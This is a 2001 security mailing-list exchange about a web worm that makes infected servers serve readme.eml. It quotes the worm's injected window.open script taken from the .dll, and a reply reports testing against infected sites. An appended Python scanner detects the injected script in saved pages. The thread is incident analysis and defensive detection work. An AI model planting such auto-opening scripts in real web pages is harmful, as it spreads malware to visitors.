Security Incidents mailing list archives
RE: Some more details on the worm
From: "Steiner, Michael" <michael.steiner () akamai com>
Date: Tue, 18 Sep 2001 11:47:36 -0700
I have gone to several infected web sites to test this exploit and I am prompted if I would like to execute. I am running IE 5.50.4522.1800 with 128-bit encryption, service pack 1, q254518, q279328 and q299618 applied.

Michael Steiner
Senior NT Administrator
Akamai Technologies, Inc.
Desk: 858-909-3319
Cell: 858-967-4394
Pager: 877-981-6158
E Mail Address: Michael.Steiner () akamai com
Pager E Mail: 8779816158 () skytel com

-----Original Message-----
From: Davis, Matt [mailto:matt.davis () countryfinancial com]
Sent: Tuesday, September 18, 2001 9:44 AM
To: Davis, Matt
Cc: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM; incidents () securityfocus com; unisog () sans org
Subject: Some more details on the worm

When pages are served up by an infected server, it looks as though readme.eml is 'attached' to them. The server attempts to get the client to open them through the following bit of code (from the .dll file):

<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

According to Slashdot, this causes the file to be automatically opened and executed by the client. I haven't been able to confirm or deny that (but if someone can, please do).

Regards,
Matt

--
Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services
309-821-6288
mailto:matt.davis () countryfinancial com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
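A defender-side check for the script quoted in the original message, added here as an example and not part of either poster's mail: it flags page bodies that contain the `window.open("readme.eml", ...)` script and reports the line where it appears. The function names, the suffix list and the sample pages are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Matches the script quoted in the post: a window.open() call whose first
# argument is readme.eml, inside a <script> element. Tolerates case, spacing,
# either quote style and an optional path prefix before the file name.
INJECTED = re.compile(
    r"<script\b[^>]*>\s*window\.open\(\s*([\"'])([^\"']*readme\.eml)\1[^)]*\)"
    r"\s*;?\s*</script>",
    re.IGNORECASE,
)

PAGE_SUFFIXES = {".htm", ".html", ".asp"}  # assumption: adjust to the site


def find_injected(html: str) -> list[tuple[int, str]]:
    """Return (line number, matched snippet) for every hit in one page body."""
    hits = []
    for m in INJECTED.finditer(html):
        line = html.count("\n", 0, m.start()) + 1
        hits.append((line, m.group(0)))
    return hits


def scan_tree(root: str) -> dict[str, list[int]]:
    """Map each page under root that contains the script to its hit lines."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PAGE_SUFFIXES:
            text = path.read_text(encoding="latin-1")  # decodes any byte value
            lines = [line for line, _ in find_injected(text)]
            if lines:
                report[str(path.relative_to(root))] = lines
    return report


# Constructed sample pages (not captured from a real server).
CLEAN = "<html><body><a href='readme.eml'>mail</a></body></html>\n"
TAGGED = (
    "<html><body>hello</body></html>\n"
    '<script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script>\n'
)

if __name__ == "__main__":
    print(find_injected(CLEAN))   # ordinary link to a .eml file: no hit
    print(find_injected(TAGGED))  # script from the post: one hit on line 2
```

`scan_tree` works on any directory of saved page bodies, for example responses fetched from a server under investigation and written to disk.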